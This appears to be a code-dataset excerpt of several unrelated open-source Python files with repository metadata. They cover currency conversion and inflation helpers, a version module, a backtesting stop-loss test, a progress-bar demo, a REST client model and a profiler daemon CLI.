# get exchange rate on a certain date.
# If not supplied, get the latest exchange rate.
# The exchange rates go back to Jan. 4, 1999.
# :param make_new_column: Generates new column
# for converted currency if True,
# otherwise, converts currency in place.
# :returns: The dataframe with converted currency column.
# .. code-block:: python
# import pandas as pd
# import janitor
# from datetime import date
# data_dict = {
# "a": [1.23452345, 2.456234, 3.2346125] * 3,
# "Bell__Chart": [1/3, 2/7, 3/2] * 3,
# "decorated-elephant": [1/234, 2/13, 3/167] * 3,
# "animals": ["rabbit", "leopard", "lion"] * 3,
# "cities": ["Cambridge", "Shanghai", "Basel"] * 3,
# }
# example_dataframe = pd.DataFrame(data_dict)
# Example: Converting a column from one currency to another
# using rates from 01/01/2018.
# .. code-block:: python
# example_dataframe.convert_currency('a', from_currency='USD',
# to_currency='EUR', historical_date=date(2018,1,1))
# Output:
# .. code-block:: python
# a Bell__Chart decorated-elephant animals cities
# 0 1.029370 0.333333 0.004274 rabbit Cambridge
# 1 2.048056 0.285714 0.153846 leopard Shanghai
# 2 2.697084 1.500000 0.017964 lion Basel
# 3 1.029370 0.333333 0.004274 rabbit Cambridge
# 4 2.048056 0.285714 0.153846 leopard Shanghai
# 5 2.697084 1.500000 0.017964 lion Basel
# 6 1.029370 0.333333 0.004274 rabbit Cambridge
# 7 2.048056 0.285714 0.153846 leopard Shanghai
# 8 2.697084 1.500000 0.017964 lion Basel
# """
# rate = _convert_currency(
# api_key, from_currency, to_currency, historical_date
# )
# if make_new_column:
# # new_column_name = column_name + "_" + to_currency
# column_name = column_name + "_" + to_currency
# df = df.assign(column_name=df[column_name] * rate)
# return df
@lru_cache(maxsize=32)
def _inflate_currency(
country: str = None, currency_year: int = None, to_year: int = None
) -> float:
# Check all inputs are correct data type
check("country", country, [str])
check("currency_year", currency_year, [int])
check("to_year", to_year, [int])
# Get WB country abbreviation
_check_wb_country(country)
if country in wb_country_dict.keys():
country = wb_country_dict[country]
else:
# `country` is already a correct abbreviation; do nothing
pass
_check_wb_years(currency_year)
_check_wb_years(to_year)
url = (
"https://api.worldbank.org/v2/country/"
+ country
+ "/indicator/FP.CPI.TOTL?date="
+ str(min(currency_year, to_year))
+ ":"
+ str(max(currency_year, to_year))
+ "&format=json"
)
result = requests.get(url)
if result.status_code != 200:
raise ConnectionError(
"WB Indicator API failed to receive a 200 "
"response from the server. "
"Please try again later."
)
# The API returns a list of two items;
# the second item in the list is what we want
inflation_dict = json.loads(result.text)[1]
# Error checking
if inflation_dict is None:
raise ValueError(
"The WB Indicator API returned nothing. "
"This likely means the currency_year and "
"to_year are outside of the year range for "
"which the WB has inflation data for the "
"specified country."
)
# Create new dict with only the year and inflation values
inflation_dict_ready = {
int(inflation_dict[i]["date"]): float(inflation_dict[i]["value"])
for i in range(len(inflation_dict))
if inflation_dict[i]["value"] is not None
}
# Error catching
if currency_year not in inflation_dict_ready.keys():
raise ValueError(
f"The WB Indicator API does not have inflation "
f"data for {currency_year} for {country}."
)
if to_year not in inflation_dict_ready.keys():
raise ValueError(
f"The WB Indicator API does not have inflation "
f"data for {to_year} for {country}."
)
inflator = (
inflation_dict_ready[to_year] / inflation_dict_ready[currency_year]
)
return inflator
@pf.register_dataframe_method
def inflate_currency(
df: pd.DataFrame,
column_name: str = None,
country: str = None,
currency_year: int = None,
to_year: int = None,
make_new_column: bool = False,
) -> pd.DataFrame:
inflator = _inflate_currency(country, currency_year, to_year)
if make_new_column:
new_column_name = column_name + "_" + str(to_year)
df[new_column_name] = df[column_name] * inflator
else:
df[column_name] = df[column_name] * inflator
return df
def convert_stock(stock_symbol: str) -> str:
if is_connected("www.google.com"):
stock_symbol = stock_symbol.upper()
return get_symbol(stock_symbol)
else:
raise ConnectionError(
"Connection Error: Client Not Connected to Internet"
)
def get_symbol(symbol: str):
result = requests.get(
"http://d.yimg.com/autoc."
+ "finance.yahoo.com/autoc?query={}®ion=1&lang=en".format(symbol)
).json()
for x in result["ResultSet"]["Result"]:
if x["symbol"] == symbol:
return x["name"]
else:
return None
| true
| true
|
790b100111e59e9ef5eca65c62ba2c50de187873
| 906
|
py
|
Python
|
tensorflow_graphics/version.py
|
drebain/graphics
|
c84b7599d1f8a55ccbdd589c1a845494c17c2784
|
[
"Apache-2.0"
] | 1
|
2021-06-30T14:22:50.000Z
|
2021-06-30T14:22:50.000Z
|
tensorflow_graphics/version.py
|
drebain/graphics
|
c84b7599d1f8a55ccbdd589c1a845494c17c2784
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_graphics/version.py
|
drebain/graphics
|
c84b7599d1f8a55ccbdd589c1a845494c17c2784
|
[
"Apache-2.0"
] | 1
|
2019-10-10T06:16:30.000Z
|
2019-10-10T06:16:30.000Z
|
#Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Defines tensorflow_graphics version information (https://semver.org/)."""
_MAJOR_VERSION = "1"
_MINOR_VERSION = "0"
_PATCH_VERSION = "0"
_VERSION_SUFFIX = ""
__version__ = ".".join([
_MAJOR_VERSION,
_MINOR_VERSION,
_PATCH_VERSION,
])
if _VERSION_SUFFIX:
__version__ = "{}-{}".format(__version__, _VERSION_SUFFIX)
| 31.241379
| 76
| 0.743929
|
_MAJOR_VERSION = "1"
_MINOR_VERSION = "0"
_PATCH_VERSION = "0"
_VERSION_SUFFIX = ""
__version__ = ".".join([
_MAJOR_VERSION,
_MINOR_VERSION,
_PATCH_VERSION,
])
if _VERSION_SUFFIX:
__version__ = "{}-{}".format(__version__, _VERSION_SUFFIX)
| true
| true
|
790b1017b47f0b31f732106e2f303d9654e402d9
| 5,977
|
py
|
Python
|
qf_lib_tests/integration_tests/backtesting/alpha_model_strategy_testers/test_alpha_model_strategy_for_stop_losses_intraday.py
|
webclinic017/qf-lib
|
96463876719bba8a76c8269cef76addf3a2d836d
|
[
"Apache-2.0"
] | 198
|
2019-08-16T15:09:23.000Z
|
2022-03-30T12:44:00.000Z
|
qf_lib_tests/integration_tests/backtesting/alpha_model_strategy_testers/test_alpha_model_strategy_for_stop_losses_intraday.py
|
webclinic017/qf-lib
|
96463876719bba8a76c8269cef76addf3a2d836d
|
[
"Apache-2.0"
] | 13
|
2021-01-07T10:15:19.000Z
|
2022-03-29T13:01:47.000Z
|
qf_lib_tests/integration_tests/backtesting/alpha_model_strategy_testers/test_alpha_model_strategy_for_stop_losses_intraday.py
|
webclinic017/qf-lib
|
96463876719bba8a76c8269cef76addf3a2d836d
|
[
"Apache-2.0"
] | 29
|
2019-08-16T15:21:28.000Z
|
2022-02-23T09:53:49.000Z
|
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import pandas as pd
from numpy.testing import assert_equal, assert_almost_equal
from qf_lib.backtesting.events.time_event.regular_time_event.market_close_event import MarketCloseEvent
from qf_lib.backtesting.events.time_event.regular_time_event.market_open_event import MarketOpenEvent
from qf_lib.common.enums.frequency import Frequency
from qf_lib.common.enums.price_field import PriceField
from qf_lib.common.utils.dateutils.date_format import DateFormat
from qf_lib.common.utils.dateutils.string_to_date import str_to_date
from qf_lib.containers.qf_data_array import QFDataArray
from qf_lib_tests.integration_tests.backtesting.alpha_model_strategy_testers.test_alpha_model_strategy_for_stop_losses import \
TestAlphaModelStrategy
class TestAlphaModelIntradayStrategy(TestAlphaModelStrategy):
data_start_date = str_to_date("2014-12-25 00:00:00.00", DateFormat.FULL_ISO)
data_end_date = str_to_date("2015-02-28 23:59:59.00", DateFormat.FULL_ISO)
end_date = str_to_date("2015-02-28 13:30:00.00", DateFormat.FULL_ISO)
frequency = Frequency.MIN_1
def test_stop_losses(self):
expected_transactions_quantities = \
[8130, -127, 1, -8004, 7454, -58, -7396, 6900, -6900, 6390, -44, -6346, 5718, -36]
result_transactions_quantities = [t.quantity for t in self.transactions]
assert_equal(expected_transactions_quantities, result_transactions_quantities)
expected_transactions_prices = [125, 130, 135, 235.6, 255, 260, 259.35, 280, 264.1, 285, 290, 282, 315, 320]
result_transactions_prices = [t.price for t in self.transactions]
assert_almost_equal(expected_transactions_prices, result_transactions_prices)
expected_portfolio_values = [1024390, 1064659, 1064659, 1064659, 1104677, 1144697, 1184717, 1224737, 1264757,
1264757, 1264757, 1304777, 1344797, 1384817, 1424837, 1464857, 1464857, 1464857,
1504877, 1544897, 1584917, 1624937, 1664957, 1664957, 1664957, 1704977, 1744997,
1785017, 1825037, 1865057, 1865057, 1865057, 1905077, 1945097, 1985117, 1885867.4,
1908229.4, 1908229.4, 1908229.4, 1945325.4, 1982305.4, 2019285.4, 1918330, 1808620,
1808620, 1808620, 1827790, 1859608, 1891338, 1923068, 1954798, 1954798, 1954798,
1789802, 1806956, 1835438, 1863848, 1892258, 1892258]
assert_almost_equal(expected_portfolio_values, list(self.portfolio.portfolio_eod_series()))
def _make_mock_data_array(self, tickers, fields):
all_dates_market_open = pd.date_range(start=self.data_start_date + MarketOpenEvent.trigger_time(),
end=self.data_end_date + MarketOpenEvent.trigger_time(), freq="B")
all_dates_market_close = pd.date_range(start=self.data_start_date + MarketCloseEvent.trigger_time() - Frequency.MIN_1.time_delta(),
end=self.data_end_date + MarketCloseEvent.trigger_time() - Frequency.MIN_1.time_delta(), freq="B")
num_of_dates = len(all_dates_market_open)
num_of_tickers = len(tickers)
num_of_fields = len(fields)
start_value = 100.0
values = np.arange(start_value, num_of_dates * num_of_tickers * num_of_fields + start_value)
reshaped_values = np.reshape(values, (num_of_dates, num_of_tickers, num_of_fields))
mocked_result_market_open = QFDataArray.create(all_dates_market_open, tickers, fields, data=reshaped_values)
mocked_result_market_close = QFDataArray.create(all_dates_market_close, tickers, fields, data=reshaped_values)
mocked_result_market_close.loc[:, :, PriceField.Low] -= 5.0
mocked_result_market_close.loc[:, :, PriceField.High] += 5.0
all_dates = all_dates_market_open.union(all_dates_market_close)
mocked_result = QFDataArray.create(all_dates, tickers, fields)
mocked_result.loc[all_dates_market_open, :, :] = mocked_result_market_open.loc[:, :, :]
mocked_result.loc[all_dates_market_close, :, :] = mocked_result_market_close.loc[:, :, :]
self._add_test_cases(mocked_result, tickers)
return mocked_result
def _add_test_cases(self, mocked_result, tickers):
# single low price breaking the stop level
mocked_result.loc[
str_to_date('2015-02-05 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
# two consecutive low prices breaking the stop level
mocked_result.loc[
str_to_date('2015-02-12 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
mocked_result.loc[
str_to_date('2015-02-13 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
# single open price breaking the stop level
mocked_result.loc[
str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 25.0
mocked_result.loc[str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Open] = \
mocked_result.loc[str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low]
| 60.373737
| 145
| 0.704367
|
import numpy as np
import pandas as pd
from numpy.testing import assert_equal, assert_almost_equal
from qf_lib.backtesting.events.time_event.regular_time_event.market_close_event import MarketCloseEvent
from qf_lib.backtesting.events.time_event.regular_time_event.market_open_event import MarketOpenEvent
from qf_lib.common.enums.frequency import Frequency
from qf_lib.common.enums.price_field import PriceField
from qf_lib.common.utils.dateutils.date_format import DateFormat
from qf_lib.common.utils.dateutils.string_to_date import str_to_date
from qf_lib.containers.qf_data_array import QFDataArray
from qf_lib_tests.integration_tests.backtesting.alpha_model_strategy_testers.test_alpha_model_strategy_for_stop_losses import \
TestAlphaModelStrategy
class TestAlphaModelIntradayStrategy(TestAlphaModelStrategy):
data_start_date = str_to_date("2014-12-25 00:00:00.00", DateFormat.FULL_ISO)
data_end_date = str_to_date("2015-02-28 23:59:59.00", DateFormat.FULL_ISO)
end_date = str_to_date("2015-02-28 13:30:00.00", DateFormat.FULL_ISO)
frequency = Frequency.MIN_1
def test_stop_losses(self):
expected_transactions_quantities = \
[8130, -127, 1, -8004, 7454, -58, -7396, 6900, -6900, 6390, -44, -6346, 5718, -36]
result_transactions_quantities = [t.quantity for t in self.transactions]
assert_equal(expected_transactions_quantities, result_transactions_quantities)
expected_transactions_prices = [125, 130, 135, 235.6, 255, 260, 259.35, 280, 264.1, 285, 290, 282, 315, 320]
result_transactions_prices = [t.price for t in self.transactions]
assert_almost_equal(expected_transactions_prices, result_transactions_prices)
expected_portfolio_values = [1024390, 1064659, 1064659, 1064659, 1104677, 1144697, 1184717, 1224737, 1264757,
1264757, 1264757, 1304777, 1344797, 1384817, 1424837, 1464857, 1464857, 1464857,
1504877, 1544897, 1584917, 1624937, 1664957, 1664957, 1664957, 1704977, 1744997,
1785017, 1825037, 1865057, 1865057, 1865057, 1905077, 1945097, 1985117, 1885867.4,
1908229.4, 1908229.4, 1908229.4, 1945325.4, 1982305.4, 2019285.4, 1918330, 1808620,
1808620, 1808620, 1827790, 1859608, 1891338, 1923068, 1954798, 1954798, 1954798,
1789802, 1806956, 1835438, 1863848, 1892258, 1892258]
assert_almost_equal(expected_portfolio_values, list(self.portfolio.portfolio_eod_series()))
def _make_mock_data_array(self, tickers, fields):
all_dates_market_open = pd.date_range(start=self.data_start_date + MarketOpenEvent.trigger_time(),
end=self.data_end_date + MarketOpenEvent.trigger_time(), freq="B")
all_dates_market_close = pd.date_range(start=self.data_start_date + MarketCloseEvent.trigger_time() - Frequency.MIN_1.time_delta(),
end=self.data_end_date + MarketCloseEvent.trigger_time() - Frequency.MIN_1.time_delta(), freq="B")
num_of_dates = len(all_dates_market_open)
num_of_tickers = len(tickers)
num_of_fields = len(fields)
start_value = 100.0
values = np.arange(start_value, num_of_dates * num_of_tickers * num_of_fields + start_value)
reshaped_values = np.reshape(values, (num_of_dates, num_of_tickers, num_of_fields))
mocked_result_market_open = QFDataArray.create(all_dates_market_open, tickers, fields, data=reshaped_values)
mocked_result_market_close = QFDataArray.create(all_dates_market_close, tickers, fields, data=reshaped_values)
mocked_result_market_close.loc[:, :, PriceField.Low] -= 5.0
mocked_result_market_close.loc[:, :, PriceField.High] += 5.0
all_dates = all_dates_market_open.union(all_dates_market_close)
mocked_result = QFDataArray.create(all_dates, tickers, fields)
mocked_result.loc[all_dates_market_open, :, :] = mocked_result_market_open.loc[:, :, :]
mocked_result.loc[all_dates_market_close, :, :] = mocked_result_market_close.loc[:, :, :]
self._add_test_cases(mocked_result, tickers)
return mocked_result
def _add_test_cases(self, mocked_result, tickers):
mocked_result.loc[
str_to_date('2015-02-05 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
mocked_result.loc[
str_to_date('2015-02-12 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
mocked_result.loc[
str_to_date('2015-02-13 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 15.0
mocked_result.loc[
str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low] -= 25.0
mocked_result.loc[str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Open] = \
mocked_result.loc[str_to_date('2015-02-23 19:59:00.00', DateFormat.FULL_ISO), tickers[0], PriceField.Low]
| true
| true
|
790b10de739422fdc1702d4f47f6221000801c25
| 1,572
|
py
|
Python
|
examples/progress/many-parallel-tasks.py
|
scalabli/quo
|
70b6d4129ee705930f1f8a792fc4c9247d973f9d
|
[
"MIT"
] | 3
|
2022-03-13T13:22:35.000Z
|
2022-03-18T08:22:51.000Z
|
examples/progress/many-parallel-tasks.py
|
scalabli/quo
|
70b6d4129ee705930f1f8a792fc4c9247d973f9d
|
[
"MIT"
] | 1
|
2022-03-21T16:29:54.000Z
|
2022-03-21T16:29:54.000Z
|
examples/progress/many-parallel-tasks.py
|
scalabli/quo
|
70b6d4129ee705930f1f8a792fc4c9247d973f9d
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""
More complex demonstration of what's possible with the progress bar.
"""
import threading
import time
from quo.text import Text
from quo.progress import ProgressBar
def main():
with ProgressBar(
title=Text("<b>Example of many parallel tasks.</b>"),
bottom_toolbar=Text("<b>[Control-L]</b> clear <b>[Control-C]</b> abort"),
) as pb:
def run_task(label, total, sleep_time):
for i in pb(range(total), label=label):
time.sleep(sleep_time)
threads = [
threading.Thread(target=run_task, args=("First task", 50, 0.1)),
threading.Thread(target=run_task, args=("Second task", 100, 0.1)),
threading.Thread(target=run_task, args=("Third task", 8, 3)),
threading.Thread(target=run_task, args=("Fourth task", 200, 0.1)),
threading.Thread(target=run_task, args=("Fifth task", 40, 0.2)),
threading.Thread(target=run_task, args=("Sixth task", 220, 0.1)),
threading.Thread(target=run_task, args=("Seventh task", 85, 0.05)),
threading.Thread(target=run_task, args=("Eight task", 200, 0.05)),
]
for t in threads:
t.daemon = True
t.start()
# Wait for the threads to finish. We use a timeout for the join() call,
# because on Windows, join cannot be interrupted by Control-C or any other
# signal.
for t in threads:
while t.is_alive():
t.join(timeout=0.5)
if __name__ == "__main__":
main()
| 34.173913
| 82
| 0.592875
|
import threading
import time
from quo.text import Text
from quo.progress import ProgressBar
def main():
with ProgressBar(
title=Text("<b>Example of many parallel tasks.</b>"),
bottom_toolbar=Text("<b>[Control-L]</b> clear <b>[Control-C]</b> abort"),
) as pb:
def run_task(label, total, sleep_time):
for i in pb(range(total), label=label):
time.sleep(sleep_time)
threads = [
threading.Thread(target=run_task, args=("First task", 50, 0.1)),
threading.Thread(target=run_task, args=("Second task", 100, 0.1)),
threading.Thread(target=run_task, args=("Third task", 8, 3)),
threading.Thread(target=run_task, args=("Fourth task", 200, 0.1)),
threading.Thread(target=run_task, args=("Fifth task", 40, 0.2)),
threading.Thread(target=run_task, args=("Sixth task", 220, 0.1)),
threading.Thread(target=run_task, args=("Seventh task", 85, 0.05)),
threading.Thread(target=run_task, args=("Eight task", 200, 0.05)),
]
for t in threads:
t.daemon = True
t.start()
for t in threads:
while t.is_alive():
t.join(timeout=0.5)
if __name__ == "__main__":
main()
| true
| true
|
790b10e66ba6f6755bae0c6eb5fe3a10af76ed1c
| 4,266
|
py
|
Python
|
purity_fb/purity_fb_1dot5/models/hardware_connector_response.py
|
unixtreme/purity_fb_python_client
|
e836afe9804ffa99f74bf4b5202f181c3c04d9df
|
[
"Apache-2.0"
] | null | null | null |
purity_fb/purity_fb_1dot5/models/hardware_connector_response.py
|
unixtreme/purity_fb_python_client
|
e836afe9804ffa99f74bf4b5202f181c3c04d9df
|
[
"Apache-2.0"
] | null | null | null |
purity_fb/purity_fb_1dot5/models/hardware_connector_response.py
|
unixtreme/purity_fb_python_client
|
e836afe9804ffa99f74bf4b5202f181c3c04d9df
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Purity//FB REST Client
Client for Purity//FB REST API (1.0), developed by [Pure Storage, Inc](http://www.purestorage.com/). Documentations can be found at [purity-fb.readthedocs.io](http://purity-fb.readthedocs.io/).
OpenAPI spec version: 1.5
Contact: info@purestorage.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class HardwareConnectorResponse(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'pagination_info': 'PaginationInfo',
'items': 'list[HardwareConnector]'
}
attribute_map = {
'pagination_info': 'pagination_info',
'items': 'items'
}
def __init__(self, pagination_info=None, items=None):
"""
HardwareConnectorResponse - a model defined in Swagger
"""
self._pagination_info = None
self._items = None
if pagination_info is not None:
self.pagination_info = pagination_info
if items is not None:
self.items = items
@property
def pagination_info(self):
"""
Gets the pagination_info of this HardwareConnectorResponse.
pagination information, only available in GET requests
:return: The pagination_info of this HardwareConnectorResponse.
:rtype: PaginationInfo
"""
return self._pagination_info
@pagination_info.setter
def pagination_info(self, pagination_info):
"""
Sets the pagination_info of this HardwareConnectorResponse.
pagination information, only available in GET requests
:param pagination_info: The pagination_info of this HardwareConnectorResponse.
:type: PaginationInfo
"""
self._pagination_info = pagination_info
@property
def items(self):
"""
Gets the items of this HardwareConnectorResponse.
a list of hardware connectors
:return: The items of this HardwareConnectorResponse.
:rtype: list[HardwareConnector]
"""
return self._items
@items.setter
def items(self, items):
"""
Sets the items of this HardwareConnectorResponse.
a list of hardware connectors
:param items: The items of this HardwareConnectorResponse.
:type: list[HardwareConnector]
"""
self._items = items
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, HardwareConnectorResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 27.701299
| 197
| 0.585795
|
from pprint import pformat
from six import iteritems
import re
class HardwareConnectorResponse(object):
swagger_types = {
'pagination_info': 'PaginationInfo',
'items': 'list[HardwareConnector]'
}
attribute_map = {
'pagination_info': 'pagination_info',
'items': 'items'
}
def __init__(self, pagination_info=None, items=None):
self._pagination_info = None
self._items = None
if pagination_info is not None:
self.pagination_info = pagination_info
if items is not None:
self.items = items
@property
def pagination_info(self):
return self._pagination_info
@pagination_info.setter
def pagination_info(self, pagination_info):
self._pagination_info = pagination_info
@property
def items(self):
return self._items
@items.setter
def items(self, items):
self._items = items
def to_dict(self):
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, HardwareConnectorResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true
| true
|
790b1144d75491d0b25d7dba6e366933b0948fd9
| 3,964
|
py
|
Python
|
pyperf/cmd/daemons.py
|
kevinconway/PyPerf
|
5aaf9943bb6d979e2f42229ed629816bc3ca1fb4
|
[
"Apache-2.0"
] | null | null | null |
pyperf/cmd/daemons.py
|
kevinconway/PyPerf
|
5aaf9943bb6d979e2f42229ed629816bc3ca1fb4
|
[
"Apache-2.0"
] | 2
|
2015-07-12T19:55:25.000Z
|
2016-01-30T14:32:11.000Z
|
pyperf/cmd/daemons.py
|
kevinconway/PyPerf
|
5aaf9943bb6d979e2f42229ed629816bc3ca1fb4
|
[
"Apache-2.0"
] | null | null | null |
"""Commands for starting daemons."""
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import pprint
import confpy.api
import confpy.core.option
from .. import messages
cfg = confpy.api.Configuration(
transport=confpy.api.Namespace(
description='Message transport options.',
source=confpy.core.option.Option(
description='The transport to fetch new requests from.',
required=True,
),
error=confpy.core.option.Option(
description='The transport to which errors are written.',
required=True,
),
result=confpy.core.option.Option(
description='The transport to which results are written.',
required=True,
),
),
daemon=confpy.api.Namespace(
description='Long running daemon options.',
profiler=confpy.core.option.Option(
description='The profiler implementation to use.',
required=True,
),
process=confpy.core.option.Option(
description='The daemon interface implemention to use.',
required=True,
),
pidfile=confpy.api.StringOption(
description='The location to use as a pidfile.',
required=True,
),
),
)
def _common_args():
"""ArgumentParser setup for all CLI commands."""
parser = argparse.ArgumentParser(
description='Start a new profiler process.'
)
parser.add_argument(
'--config',
required=True,
help='The Python configuration file for the process.',
)
return parser
def profiler_main():
"""Manage a profiler daemon."""
parser = _common_args()
parser.add_argument(
'--action',
required=True,
choices=('start', 'stop', 'restart'),
)
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
proc = cfg.daemon.process(
source_transport=cfg.transport.source,
error_transport=cfg.transport.error,
results_transport=cfg.transport.result,
profiler=cfg.daemon.profiler,
pidfile=cfg.daemon.pidfile,
)
if args.action == 'stop':
proc.stop()
if args.action == 'start':
proc.start()
if args.action == 'restart':
proc.restart()
def send_request():
"""Send a profile request to the daemon."""
parser = _common_args()
parser.add_argument(
'--identifier',
required=True,
help='The unique message identifier.',
)
parser.add_argument(
'--setup',
default='pass',
help='Any setup code if needed for the profile.',
)
parser.add_argument(
'--code',
required=True,
help='The code to profile.',
)
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
cfg.transport.source().send(
messages.ProfileRequest(
identifier=args.identifier,
setup=args.setup,
code=args.code,
),
)
def fetch_result():
"""Fetch a result from the transport."""
parser = _common_args()
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
transport = cfg.transport.result()
msg = transport.fetch()
if msg is not None:
transport.complete(msg)
pprint.pprint(msg.json)
def fetch_error():
"""Fetch an error from the transport."""
parser = _common_args()
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
transport = cfg.transport.error()
msg = transport.fetch()
if msg is not None:
transport.complete(msg)
pprint.pprint(msg.json)
| 25.74026
| 77
| 0.619324
|
from __future__ import division
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import pprint
import confpy.api
import confpy.core.option
from .. import messages
cfg = confpy.api.Configuration(
transport=confpy.api.Namespace(
description='Message transport options.',
source=confpy.core.option.Option(
description='The transport to fetch new requests from.',
required=True,
),
error=confpy.core.option.Option(
description='The transport to which errors are written.',
required=True,
),
result=confpy.core.option.Option(
description='The transport to which results are written.',
required=True,
),
),
daemon=confpy.api.Namespace(
description='Long running daemon options.',
profiler=confpy.core.option.Option(
description='The profiler implementation to use.',
required=True,
),
process=confpy.core.option.Option(
description='The daemon interface implemention to use.',
required=True,
),
pidfile=confpy.api.StringOption(
description='The location to use as a pidfile.',
required=True,
),
),
)
def _common_args():
parser = argparse.ArgumentParser(
description='Start a new profiler process.'
)
parser.add_argument(
'--config',
required=True,
help='The Python configuration file for the process.',
)
return parser
def profiler_main():
parser = _common_args()
parser.add_argument(
'--action',
required=True,
choices=('start', 'stop', 'restart'),
)
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
proc = cfg.daemon.process(
source_transport=cfg.transport.source,
error_transport=cfg.transport.error,
results_transport=cfg.transport.result,
profiler=cfg.daemon.profiler,
pidfile=cfg.daemon.pidfile,
)
if args.action == 'stop':
proc.stop()
if args.action == 'start':
proc.start()
if args.action == 'restart':
proc.restart()
def send_request():
parser = _common_args()
parser.add_argument(
'--identifier',
required=True,
help='The unique message identifier.',
)
parser.add_argument(
'--setup',
default='pass',
help='Any setup code if needed for the profile.',
)
parser.add_argument(
'--code',
required=True,
help='The code to profile.',
)
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
cfg.transport.source().send(
messages.ProfileRequest(
identifier=args.identifier,
setup=args.setup,
code=args.code,
),
)
def fetch_result():
parser = _common_args()
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
transport = cfg.transport.result()
msg = transport.fetch()
if msg is not None:
transport.complete(msg)
pprint.pprint(msg.json)
def fetch_error():
parser = _common_args()
args, _ = parser.parse_known_args()
cfg = confpy.api.parse_options(files=(args.config,), env_prefix='PYPERF')
transport = cfg.transport.error()
msg = transport.fetch()
if msg is not None:
transport.complete(msg)
pprint.pprint(msg.json)
| true
| true
|
790b12e07c9d98672f8fa8e1fa2048ff267f36b2
| 460
|
py
|
Python
|
run_generator.py
|
vps01bao/StyleGAN2
|
1abec4c69d7983dda5ba3594ea71e5b4cf8c9a9c
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
vps01bao/StyleGAN2
|
1abec4c69d7983dda5ba3594ea71e5b4cf8c9a9c
|
[
"BSD-Source-Code"
] | null | null | null |
run_generator.py
|
vps01bao/StyleGAN2
|
1abec4c69d7983dda5ba3594ea71e5b4cf8c9a9c
|
[
"BSD-Source-Code"
] | null | null | null |
import os as alpha
